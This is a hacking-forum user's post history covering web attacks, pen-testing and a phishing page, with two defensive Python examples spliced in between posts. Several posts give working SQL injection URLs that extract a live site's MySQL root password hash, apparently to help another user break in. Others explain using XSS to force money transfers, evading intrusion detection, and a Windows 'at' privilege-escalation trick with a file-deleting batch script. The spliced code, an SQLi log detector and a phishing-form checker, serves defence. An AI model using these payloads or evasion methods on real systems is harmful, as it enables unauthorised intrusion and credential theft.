Everything posted by \xC3

  1. Since you can use javascript and jquery with XSS, one tactic you can use is kind of like session hijacking and cross site referral forgery: Because your XSS on the site has the site name in the referrer information, you can automate form submissions on the affected site in the context of the logged-in user. For example, if an attacker found an XSS vulnerability in a payment processing web site, the attacker could use the vulnerability to send a malicious link to a logged-in user, which would then (using jscript or jquery) force the logged-in user to send money to the attacker via a form submission. This would also bypass referrer checking in most cases because the domain name would be in the referrer URL. Click-n-pwn. NOTE: This is not something that I condone in any way. I am simply explaining the full potential of an XSS vulnerability.
  2. You may want to try some boolean enumeration. See if the following works: hxxp://*****.com/poll.php?id=1%20AND%201=1 hxxp://*****.com/poll.php?id=1%20AND%201=0 The first should return whatever is usually there, and I'm guessing that the second should make no "poll" display. If you get this far, you have a working true and false. If this is the case, then, hxxp://*****.com/poll.php?id=1%20AND%20((ASCII((MID((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1),1,1))))>96) Will tell you if the ASCII code of the first character of the password is greater than 96 (lowercase a or above). If this works, you'll want to break out an ASCII chart to cross compare. You should be able to modify the above query to properly isolate the correct values. I am not 100% sure about MySQL 5.0, but I believe the hash to be stored in hexadecimal, meaning your possible ASCII codes will be 97-102 (a-f) and 48-57 (0-9). You may also want to find the length of the hash with the following comparison: hxxp://*****.com/poll.php?id=1%20AND%20((LENGTH((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1)))>10) This will "return true" if the length of the hash is greater than ten. Happy hacking. Hope this helped. EDIT: SQL Syntax EDIT: One more thing -- you may want to check out the grants table. This will tell you if it's A) world accessible or you have the privileges you want. Just a thought.
  3. If it were unary, there'd ONLY be 0. Binary (bi) from the Latin (two) or language of two. 0 and 1 are two different values, hence "binary". All data is stored in binary format. All ASCII codes have their own binary equivalent. Same goes for hex, etc ad nauseam. All code executes in RAM or Cache as binary. All packets are formatted in binary at one layer or another, especially if you inspect such low level as ethernet frames etc. IP addresses are binary (in the packet level). As everything with a computer is deterministic, binary is what makes it so. The common thread, as it were.
  4. Wow. Judging from the fact that writing exploits is part of legitimate research for security firms, writing them shouldn't be illegal. I'd have to say using them on any gear other than your own is and should be, however writing them and testing them is a necessary part of vulnerability confirmation: If you discover a vulnerability in code, you are not 100% sure it's vulnerable until you have written a test exploit. Even though this may only echo "I am vulnerable" back to the attacker, you've gotta do it as a researcher. Just part of life. Secondly, while I agree that viruses, released into the public, are both hazardous and problematic, and that releasing them, to the public, should be highly illegal: Many distributed computing systems and artificial intelligence research machines have very worm like properties about the way they distribute themselves across a network. Technically because certain behavioral patterns and codes are being copied and quantified, this too can be considered a virus. As a result, I /don't/ think that /writing/ anything should be illegal, simply deploying it into an environment which can allow it to affect anything outside of your own network should be strictly prohibited (and right now, as I see it, is). In any case, no one likes conficker, and if you're a researcher with /that much/ time on your hands, it might be worth the $250k to analyze and trace. Nmap has also made it somewhat easy to pinpoint infected machines. Does have some patch detection bugs though.
  5. Well you may just want to try making it have an error. Usually if verbose errors are enabled it will freak out and give you the full path For example: hxxp://anysiterunningw0rdpr3s$.com/wp-settings.php Dig around for an includes directory or something. You can almost always get it to fork an error of some sort. EDIT: Seeing as you're root, you may want to check out the mysql.user and the INFORMATION schema tables: Since you're using the particular versions that you are: http://dev.mysql.com/doc/refman/5.0/en/inf...ion-schema.html might even try: hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root'),null– hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1),null– (SELECT Password FROM mysql.user WHERE host='localhost' AND user='root') OR (SELECT Password FROM mysql.user WHERE user='root' LIMIT 1) May return a SQL 5.0 password hash, since you are running as root, after all.
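Posts 2 and 5 above both turn on the same defect: the `poll.php?id=` parameter is pasted straight into a SQL statement, so a boolean probe such as `1 AND 1=0` changes what the query returns. The following is an added example, not code from the site discussed or from the poster, written from the defender's side. It uses an in-memory SQLite table as a constructed stand-in for the MySQL backend and shows the vulnerable lookup beside its parameterised form, plus a small log check that flags the boolean-probe shape in query strings; the table, the log lines and the function names are all assumptions made for this example.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the poll backend (not the site on the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE polls (id INTEGER PRIMARY KEY, question TEXT)")
    conn.executemany("INSERT INTO polls VALUES (?, ?)",
                     [(1, "Favourite editor?"), (2, "Tabs or spaces?")])
    return conn

def get_poll_unsafe(conn, poll_id):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so "1 AND 1=0" is evaluated as a condition instead of treated as an id.
    sql = "SELECT question FROM polls WHERE id = " + poll_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def get_poll_safe(conn, poll_id):
    # Hardened: enforce the expected type, then bind the value as a parameter.
    # Anything that is not an integer is rejected before SQL is involved.
    try:
        pid = int(poll_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT question FROM polls WHERE id = ?", (pid,)).fetchone()
    return row[0] if row else None

# Boolean-probe shape: a bare AND/OR followed by a tautology/contradiction or
# a character/length function, as seen in blind enumeration attempts.
PROBE = re.compile(
    r"\b(AND|OR)\b\s*\(*\s*(\d+\s*=\s*\d+|ASCII\(|LENGTH\(|SUBSTRING\(|MID\()",
    re.I,
)

# Constructed access-log lines in Apache common log format (hypothetical hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2009:12:00:01 +0000] "GET /poll.php?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/May/2009:12:00:05 +0000] "GET /poll.php?id=1%20AND%201=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/May/2009:12:00:06 +0000] "GET /poll.php?id=1%20AND%201=0 HTTP/1.1" 200 210',
    '192.0.2.10 - - [10/May/2009:12:00:09 +0000] "GET /poll.php?id=1%20AND%20(LENGTH(a)>10) HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/May/2009:12:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024',
]

def find_sqli_probes(log_lines):
    """Return (line_no, param, decoded_value) for query parameters that look like probes."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        # parse_qs percent-decodes each value, so %20 becomes a space here.
        for name, values in parse_qs(urlsplit(m.group(1)).query).items():
            for v in values:
                if PROBE.search(v):
                    hits.append((n, name, v))
    return hits

if __name__ == "__main__":
    db = make_db()
    print("unsafe, 1 AND 1=1 ->", get_poll_unsafe(db, "1 AND 1=1"))
    print("unsafe, 1 AND 1=0 ->", get_poll_unsafe(db, "1 AND 1=0"))
    print("safe,   1 AND 1=0 ->", get_poll_safe(db, "1 AND 1=0"))
    for hit in find_sqli_probes(SAMPLE_LOG):
        print("probe on line %d: %s=%r" % hit)
```

The unsafe lookup returns the poll for `1 AND 1=1` and nothing for `1 AND 1=0`, which is exactly the true/false oracle the posts describe; the parameterised version returns nothing for either because the value is not an integer. The log check is deliberately narrow (it keys on the AND/OR-plus-function shape) and is a triage aid, not a substitute for fixing the query.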
  6. Because you're attacking the 'network' and not the 'host' or 'service' behind a 'port' you may want to think about the fact that networks are supported by network devices such as routers, switches, firewalls, NAC solutions, etc. Network devices generally use protocols like SNMP, OSPF, HSRP, RIP, CDP, STP, ICMP, BGP, and I'm sure there are plenty that I'm forgetting. These protocols all have RFCs or "Requests For Comment" that dictate the specifications for communication using these protocols. Most of the time, network vulnerabilities (as opposed to server or software based vulnerabilities) are a result of mis-configured network devices or design flaws in the protocol handlers. When unauthenticated instructions can be sent to a network device, sometimes the network device does what it's told. This can cause all sorts of things, for example, if you find a BGP abuse, then you can specify another router as the border gateway. Hope this helps.
  7. The best place to leave them is by the smoker's bench.
  8. Thumbs.db is protected by the standard windows file/memory protection mechanism, NTLDR, which is why explorer just re-attribs stuffs when you view the folder. You might be able to attrib -r -s -h NTLDR (I think it's in the root of the system drive (C:)) and then delete it, but if you do that you throw all the other file protection out the window. You also might be able to apply a binary patch to explorer that prevents it from re-attrib'ing stuff. Hope this helps.
  9. I highly doubt that, because browsers work by sending a request to the DNS Server then they talk directly with the IP address instead of using the domain or URL. If you want to spend time home-brewing an application, then I guess it would be possible by monitoring all the DNS requests and blocking traffic to IP Addresses which were not sent back from a DNS server. In any case, this is still easy to bypass.
  10. I don't have an iPod, but if you can ssh into it, you should be able to 'dd' the drive and create an image. Maybe pipe it through telnet or netcat with a listening port on your local machine that pipes it into a file...
  11. Hay! I'm heading out tonight, should be there around 9-10 PM.
  12. Yeah, I noticed that myself. There are a couple other threads I've seen from members that have recently joined that make me think binrev is currently being hit by hordes of trolls.
  13. I did a little research on that hosting site and they don't give you /too much/ space for free. makes me wonder if we could fill up his entire directory with like 50 mb of text logs so he can't do this stuff anymore..
  14. For starters, let's notice that the URL in the URL bar doesn't contain Binrev.com. Now here's the code: <input type="hidden" name="act" value="Login" /> <input type="hidden" name="CODE" value="01" /> <input type="hidden" name="s" value="ece7a530afe53e91ae89129751338828" /> <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443" /> <input type="hidden" name="CookieDate" value="1" /> <h4>You are not logged in, you may log in below</h4> <div class="fieldwrap"> <h4>Your account username</h4> <input type="text" size="20" maxlength="64" name="UserName" /> <h4>Your account password</h4> <input type="password" size="20" name="PassWord" /> <p class="formbuttonrow1"><input class="button" type="submit" name="submit" value="Log In" /></p> </div> </form> First, let's notice that the form method is "GET" not "POST". The real code to the forum is as follows: <form action="http://www.binrev.com/forums/index.php?act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()"> <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?" /> <div class="borderwrap"> <div class="maintitle"><img src='style_images/green/nav_m.gif' border='0' alt='>' width='8' height='8' /> Log In</div> <div class='row2'> <div class="formsubtitle">Please enter your details below to log in</div> <div class="errorwrap" style='margin-bottom:0px;padding-bottom:0px'> <h4>Attention!</h4> <p>You must already have registered for an account before you can log in.<br />If you do not have an account, you may register by clicking the 'register' link near the top of the screen</p> <p><b>I've forgotten my password! 
<a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=10">Click here!</a></b></p> </div> </div> <table class='ipbtable' cellspacing="0"> <tr> <td width="60%" valign="top" class='row2'> <fieldset> <legend><b>Log In</b></legend> <table class='ipbtable' cellspacing="1"> <tr> <td width="50%"><b>Enter your user name</b></td> <td width="50%"><input type="text" size="25" maxlength="64" name="UserName" /></td> </tr> <tr> <td width="50%"><b>Enter your password</b></td> <td width="50%"><input type="password" size="25" name="PassWord" /></td> </tr> </table> </fieldset> </td> <td width="40%" valign="top" class='row2'> <fieldset> <legend><b>Options</b></legend> <table class='ipbtable' cellspacing="1"> <tr> <td width="10%"><input class='checkbox' type="checkbox" name="CookieDate" value="1" checked="checked" /></td> <td width="90%"><b>Remember me?</b><br /><span class="desc">This is not recommended for shared computers</span></td> </tr> <tr> <td width="10%"><input class='checkbox' type="checkbox" name="Privacy" value="1" /></td> <td width="90%"><b>Log in as invisible</b><br /><span class="desc">Don't add me to the active users list</span></td> </tr> </table> </fieldset> </td> </tr> <tr> <td class="formbuttonrow" colspan="2"><input class="button" type="submit" name="submit" value="Log me in" /></td> </tr> <tr> <td class="catend" colspan="2"><!-- no content --></td> </tr> </table> </div> </form> So I mean, look at the difference. Notice the action in the first code is "next.php" and that's not at all what the action is in the real src to the site. There are other differences between the codes, which I don't have to point out now - I'm sure it's becoming readily apparent.
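The comparison in post 14 comes down to two mechanical checks: where does the login form actually submit to, and by which method. The following is an added example, not the poster's code or the forum software's, that automates that comparison for triage of a suspected lookalike page. It parses the HTML with the standard library, resolves the form action against the page URL, and reports password-bearing forms whose target host is not the expected one or whose method is GET. The two sample pages are constructed for this example (the lookalike host `lookalike.example` is hypothetical; `www.binrev.com` is the host named in the post), and the function names are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FormCollector(HTMLParser):
    """Collect every <form> with its attributes and the <input> tags it contains."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),  # HTML default is GET
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def audit_login_forms(page_url, html, expected_host):
    """Return (finding, detail) pairs for every form on the page that carries a password field."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not any(i.get("type") == "password" for i in form["inputs"]):
            continue
        # A relative action such as "next.php" resolves against the page's own URL,
        # which is the attacker's host on a lookalike page.
        target = urlsplit(urljoin(page_url, form["action"]))
        if target.hostname != expected_host:
            findings.append(("action_host_mismatch", target.hostname or ""))
        if form["method"] != "post":
            findings.append(("password_sent_via_get", form["method"]))
    return findings

# Constructed sample: a lookalike login page served from a hypothetical host,
# modelled on the shape of the fake form quoted in the post.
LOOKALIKE_PAGE_URL = "http://lookalike.example/forums/index.php"
LOOKALIKE_HTML = """
<form action="next.php" method="get">
  <input type="hidden" name="act" value="Login" />
  <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php" />
  <input type="text" name="UserName" />
  <input type="password" name="PassWord" />
  <input type="submit" name="submit" value="Log In" />
</form>
"""

# Constructed sample: the genuine form's action and method as quoted in the post.
GENUINE_PAGE_URL = "http://www.binrev.com/forums/index.php"
GENUINE_HTML = """
<form action="http://www.binrev.com/forums/index.php?act=Login&amp;CODE=01" method="post">
  <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?" />
  <input type="text" name="UserName" />
  <input type="password" name="PassWord" />
  <input type="submit" name="submit" value="Log me in" />
</form>
"""

if __name__ == "__main__":
    print("lookalike:", audit_login_forms(LOOKALIKE_PAGE_URL, LOOKALIKE_HTML, "www.binrev.com"))
    print("genuine:  ", audit_login_forms(GENUINE_PAGE_URL, GENUINE_HTML, "www.binrev.com"))
```

On the lookalike page the relative `next.php` resolves to the lookalike host and the method is GET, so both findings fire; the genuine form posts to the expected host and produces none. The check is intentionally limited to what the post itself compares; a fuller audit would also look at the scheme and at where hidden redirect fields point.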
  15. This kid is a lame phisher.

  16. I see, yeah I posted that before heading out to lunch. Hadn't had the time to do the review myself yet. Upon further review I found the real URL and read the source to the page myself, makes me wonder if he's using an SQL powered backend to store user data, if so maybe bobby tables... I never really gave it my real credentials, that's why I wondered how I was actually logged in if the session was incrementing without a cookie heist. EDIT: It's a GET request to a file called next.php..... Includes a referrer url for the redirect. And upon further review, http://h1.ripway.com/acedaarcher/ is another redirect page for some other forum. This guy seems to have gone around the block trying to access other security researcher/hacker hobbyist information.
  17. Hmm, I wonder if he can actually harvest cookies with this stuff. I went there and typed in lol@ for the username and you for the password, and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev. Obviously I changed my password, but I'm curious now. I'm guessing it's a pretty standard CURL scam anyway....
  18. I'm definitely attending.
  19. :glare: WTF? The most advanced config with Ubuntu I can think of is like SELinux + PaX + GrSec. Maybe some sort of virtualization application like Xen or VMWare. I wouldn't even /really/ trust them at a blackhat conference. There is still room for error. You know, other people write those exploits on milw0rm and metasploit. Ever considered writing your own? You just have to know how exploits work and quit using everyone else's tools. Build your own tools when attempting to crack systems that you may think are hardcore, you'll get much further much more quickly. My advice: go take some time off to learn about fuzzing and machine code. Forget about breaking into your friend's box and actually learn what your tools are doing, why they work on some systems, why they don't on others -- and I don't just mean "Well that's because this is for version blah and this is for version blah", no.... I mean exact your understanding the vulnerabilities, how a buffer overflow works, figure out what the %eip register is on your processor, break out a debugger... Go from there. Maybe buy some assembly books and hit up the intel arch manuals while you're at it. When you find your first few zero-days, then maybe you can go back and wargame with your friend...
  20. Submit a bug to Mao on the oxid.it support forums. That's my suggestion. If Cain were open source, I'd tell you to just write a patch, but because it's not, you'll have to ask Mao to do so.
  21. Sometimes tools do what you do when you check a site by hand automatically. Usually though, these tools are closed-source. You send your own requests to a webserver, usually GET and POST requests (sometimes with cookie weirdness), when you check by hand, right? Why couldn't a program just send the same types of requests, then compare the file outputs? No reason it couldn't. That's what some of the proprietary (and maybe?) open source tools do. I don't really use tools other than custom apps written by myself or my friends, but generally speaking my tools work just as well as testing by hand. They simply automated the process.
  22. As this thread is about pen-testing, I'd have to say any /authorized/ pen-test is usually /expected/ to set off a few alarms. Also, not all nmap and nikto scans are loud. I suggest reading the docs to learn about evasion options. For example, on nikto, -evasion 9 will usually hide from network layer IDS systems if the remote host is vulnerable to session splicing. The attack will still be logged, but alarms won't be set off. Not from the network layer anyway. Another trick to hide from the network layer is to simply run scans over HTTPS. Sniffers (except certain IPS systems which are programmed to do an SSL man in the middle) aren't programmed to decrypt the traffic on the fly. A decent system will also rely on a HIDS/HIPS system, which sometimes will be set off and other times won't be. There are plenty of other options too, and if you're going to say test it manually, how do you justify the amount of time it takes to test all ports? I fail to understand. Oftentimes the /decent/ black hats (sorry kingospam, but you said "the ones who haven't been busted", so I'm assuming blackhats) don't even scan things by hand; they do a distributed scan from 65,355 botnet nodes, each node testing a single port, then reporting back to the botnet's controller or peer-to-peer with each other until they reach some sort of hub. This technique is also used to evade an application called "Port Sentry", which is what is running on those systems that you scan with nmap which seem to have EVERY port open for some reason. There are other ways to hide your connections, like out-of-sequence spoofed fin/rst/ack connection closing (if you make it look like the two boxes "hung up", then most sniffers just quit recording the rest of the traffic, similar to the 2600 hz tone, except for computers). It is possible to pen-test without commercial tools, and as kingospam mentioned, you are oftentimes more successful IF you know what to test by hand. 
A lot of times you do an automated scan as a preliminary, and then afterwards you check the "fuzzy spots" by hand, things like SQL injection vulnerabilities and other common vulns. Sometimes if nmap returns a version to you, you can simply google up an exploit and use that. Blind fuzzing can be productive as well but very time consuming, but remember that big packetslaps are pretty obvious to NIDS systems. Books and resources? Not really that I can think of. Maybe hit up some RFCs, learn web applications programming, and perhaps even grab a copy of the shellcoder's handbook. And always remember that the maximum allowable stack size on a little endian processor is limited to 16 megabytes.
  23. If you are using windows XP, try to use the "at flaw" to get system privileges: C:\>at [military timestamp one minute from now] /interactive taskmgr.exe Do this without having the task manager open. Now as system, you should be able to hit "new task" from the task manager and open a different cmd.exe. Inside that cmd.exe, after killing all of the iexplore.exe processes : C:\PROGRA~1>attrib -r -s -h iexplore.exe C:\PROGRA~1>del iexplore.exe If the iexplore processes start too quickly, try putting the following into a batch file : @echo off taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe cd \ cd PROGRA~1 attrib -r -s -h iexplore.exe del iexplore.exe Put that in killer.bat and then just execute killer.bat as system. Hope it helps -- may or may not work, post back.
  24. I believe a lot of your questions have already been answered in this thread.
  25. Well a remote control for an RC car isn't near the same as an mp3 player. As for the remote control example, I'm pretty sure that can be done explicitly through circuitry, different signals hitting different receivers triggering different circuits. As far as the mp3 player, it would need a media type (flash, sd, etc) and a way to read that media, and if you planned on having some sort of digital display something to interface with that as well. I believe this can be hard-wired for the most part, but there is sure to be some sort of embedded programming involved. As for the embedded programming, it's not for all devices, except those which integrate with computers (for the most part). The best languages to learn embedded programming in are C and assembly. Hope this helps.